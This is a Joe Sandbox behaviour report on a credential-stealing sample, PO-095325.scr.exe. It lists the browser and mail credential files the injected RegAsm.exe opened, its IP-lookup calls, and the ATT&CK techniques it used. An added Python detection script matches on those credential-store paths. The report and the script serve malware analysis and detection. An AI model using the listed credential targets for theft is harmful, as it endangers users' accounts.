                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO-095325.scr.exe PID: 4424, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1992, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4466181997.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO-095325.scr.exe PID: 4424, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1992, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO-095325.scr.exe PID: 4424, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1992, type: MEMORYSTR
ATT&CK matrix, listed per tactic (a leading number is the badge the report attaches to a flagged technique; unnumbered techniques are matrix placeholders the report did not flag):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 121 Windows Management Instrumentation; 1 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 2 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 11 Masquerading; 161 Virtualization/Sandbox Evasion; 311 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 File and Directory Discovery; 34 System Information Discovery; 431 Security Software Discovery; 1 Process Discovery; 161 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 1428828 | Sample: PO-095325.scr.exe | Start date: 19/04/2024 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 8 other signatures
DNS names resolved: ip-api.com; api.ipify.org

Process tree (node badges are the counts the legend describes):
PO-095325.scr.exe (started; badge 3)
    signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    RegAsm.exe (started; badges 15, 2)
        network: ip-api.com 208.95.112.1, local port 49708, remote port 80, TUT-ASUS, United States; api.ipify.org 104.26.12.205, local port 49707, remote port 443, CLOUDFLARENETUS, United States
        signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); 2 other signatures
    powershell.exe (started; badge 21)
        signatures: Loading BitLocker PowerShell Module
        conhost.exe (started)
svchost.exe (started; badges 1, 1)
    network: 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label | Link
PO-095325.scr.exe | 29% | ReversingLabs | Win32.Trojan.GenSteal |
PO-095325.scr.exe | 100% | Avira | HEUR/AGEN.1308640 |
PO-095325.scr.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
https://contoso.com/License | 0% | URL Reputation | safe |
https://api.ipif8 | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://go.micros | 0% | URL Reputation | safe |
http://crl.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
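The credential-store accesses listed under Stealing of Sensitive Information (RegAsm.exe opening the Chrome and Edge Login Data files, the Firefox, Thunderbird, Cyberfox and BlackHawk profiles.ini files, and the Outlook and IncrediMail registry keys) together with the two lookup services in the domain and URL tables above (api.ipify.org and ip-api.com/line/?fields=hosting) are the observations a detection engineer would turn into a rule: RegAsm.exe is a .NET SDK tool with no business reading browser password stores or asking whether its host is a data centre. The Python below is an added example, not code from the Joe Sandbox report. It parses behaviour lines in the report's own "Source: <process> <event>: <object>" layout (tolerating the fused columns and the trailing "Jump to behavior" link text), flags a credential store read by any process other than its owning application, and tags the lookup-service contacts with the ATT&CK technique they evidence. The owner process names, the "URL contacted" event label and the sample lines are constructed for this example; the sample lines reproduce this report's RegAsm.exe rows plus two benign rows for contrast.

```python
"""Triage Joe Sandbox style behaviour lines for credential-store access and
public-IP / hosting lookups. Added example; not code from the Joe Sandbox report."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import urlsplit

# Credential stores the report shows RegAsm.exe opening, each paired with the process
# that legitimately owns it (owner image names are assumptions made for this example).
CREDENTIAL_FILES = [
    (r"\\Google\\Chrome\\User Data\\.*\\Login Data$", "chrome.exe", "Chrome saved logins"),
    (r"\\Microsoft\\Edge\\User Data\\.*\\Login Data$", "msedge.exe", "Edge saved logins"),
    (r"\\Mozilla\\Firefox\\profiles\.ini$", "firefox.exe", "Firefox profile index"),
    (r"\\Thunderbird\\profiles\.ini$", "thunderbird.exe", "Thunderbird profile index"),
    (r"\\8pecxstudios\\Cyberfox\\profiles\.ini$", "cyberfox.exe", "Cyberfox profile index"),
    (r"\\NETGATE Technologies\\BlackHawk\\profiles\.ini$", "blackhawk.exe", "BlackHawk profile index"),
]
CREDENTIAL_KEYS = [
    (r"\\Windows Messaging Subsystem\\Profiles$", "outlook.exe", "Outlook/MAPI profiles"),
    (r"\\IncrediMail\\Identities$", "incmail.exe", "IncrediMail identities"),
]
# Lookup services the sample contacted: api.ipify.org returns the external IP,
# ip-api.com with fields=hosting says whether that IP belongs to a hosting provider.
LOOKUP_HOSTS = {"api.ipify.org", "ip-api.com"}

# "File opened" / "Key opened" are the report's event names; "URL contacted" is a
# constructed label for its network rows. Column separators may be missing, as in
# the extracted report, and a trailing "Jump to behavior" link is ignored.
LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)\s*"
    r"(?P<event>File opened|Key opened|URL contacted):\s*"
    r"(?P<obj>.+?)\s*(?:Jump to behavior)?$"
)


@dataclass
class Finding:
    process: str    # image name of the acting process, lower-cased
    event: str
    obj: str        # file path, registry key or URL
    technique: str  # ATT&CK technique id
    note: str


def _image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(line: str) -> Optional[Finding]:
    """Return a Finding for one behaviour line, or None if it is benign or unparseable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    actor, event, obj = _image_name(m["proc"]), m["event"], m["obj"]
    if event in ("File opened", "Key opened"):
        table = CREDENTIAL_FILES if event == "File opened" else CREDENTIAL_KEYS
        technique = "T1555.003" if event == "File opened" else "T1555"
        for pattern, owner, desc in table:
            # The owning application reading its own store is normal; any other
            # process reading it is credential theft.
            if re.search(pattern, obj, re.IGNORECASE) and actor != owner:
                return Finding(actor, event, obj, technique, f"{desc} read by non-owner process")
        return None
    host = (urlsplit(obj).hostname or "").lower()
    if host not in LOOKUP_HOSTS:
        return None
    if "fields=hosting" in obj:
        return Finding(actor, event, obj, "T1497", "asks ip-api.com whether the host is in a data centre")
    return Finding(actor, event, obj, "T1016", "external IP lookup, typical victim fingerprinting")


def triage(lines: Iterable[str]) -> List[Finding]:
    return [f for f in map(classify, lines) if f is not None]


def techniques(findings: Iterable[Finding]) -> List[str]:
    return sorted({f.technique for f in findings})


# Constructed sample: this report's RegAsm.exe rows plus two benign rows for contrast.
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
SAMPLE_LINES = [
    f"Source: {REGASM} File opened: C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
    f"Source: {REGASM} File opened: C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini",
    # Raw extracted layout: no separator before the event, link text at the end.
    f"Source: {REGASM}Key opened: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\ProfilesJump to behavior",
    f"Source: {REGASM} URL contacted: http://ip-api.com/line/?fields=hosting",
    f"Source: {REGASM} URL contacted: https://api.ipify.org/",
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\System32\svchost.exe File opened: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"{f.technique:9} {f.process:12} {f.event}: {f.obj}  [{f.note}]")
```

Run as a script it prints five findings, all attributed to regasm.exe, and nothing for the chrome.exe and svchost.exe rows. The owner check is what keeps the rule quiet on a normal workstation: browsers and mail clients open these files constantly, so the signal is the process identity, not the path alone. In a real pipeline the same classify function would be fed Sysmon event 11/13 or EDR file-open telemetry after mapping those fields onto the three event labels.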
| Name | Source | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- |
| https://api.ipify.org/T4 | RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://account.dyn.com/ | PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high |
| http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown |
| http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/License | powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://api.ipif8 | RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://contoso.com/Icon | powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://crl.ver) | svchost.exe, 00000005.00000002.3638291875.00000214424A8000.00000004.00000020.00020000.00000000.sdmp | false | | low |
| https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000005.00000003.2028768858.00000214421F0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr | false | | high |
| https://api.ipify.org/p | RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.ipify.org/t | RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://github.com/sam210723/goesrecv-monitor/releases/latest | PO-095325.scr.exe, 00000000.00000002.2032466947.0000000005290000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://go.micros | powershell.exe, 00000002.00000002.2047492767.0000000004BF3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://api.ipify.org | RegAsm.exe, 00000004.00000002.4466181997.000000000338E000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://g.live.com/odclientsettings/Prod/C: | edb.log.5.dr | false | | high |
| https://api.ipify.org | PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high |
| http://crl.micro | powershell.exe, 00000002.00000002.2055731933.0000000008132000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.2047492767.0000000004741000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://vksdr.com/goesrecv-monitor | PO-095325.scr.exe, 00000000.00000002.2032466947.0000000005290000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/ | powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://ip-api.com | RegAsm.exe, 00000004.00000002.4466181997.00000000033C6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000033AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003301000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2047492767.0000000004741000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false |
| 104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false |
                                                                      IP
                                                                      127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1428828
Start date and time: 2024-04-19 17:13:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO-095325.scr.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/11@2/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 52
• Number of non-executed functions: 9
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 184.31.62.93
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5500 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: PO-095325.scr.exe
| Time | Type | Description |
| --- | --- | --- |
| 17:13:58 | API Interceptor | 21x Sleep call for process: powershell.exe modified |
| 17:13:59 | API Interceptor | 3x Sleep call for process: svchost.exe modified |
| 17:14:00 | API Interceptor | 11650889x Sleep call for process: RegAsm.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| 208.95.112.1 | Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | ip-api.com/line/?fields=hosting |
| 208.95.112.1 | REMITTANCE COPY.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting |
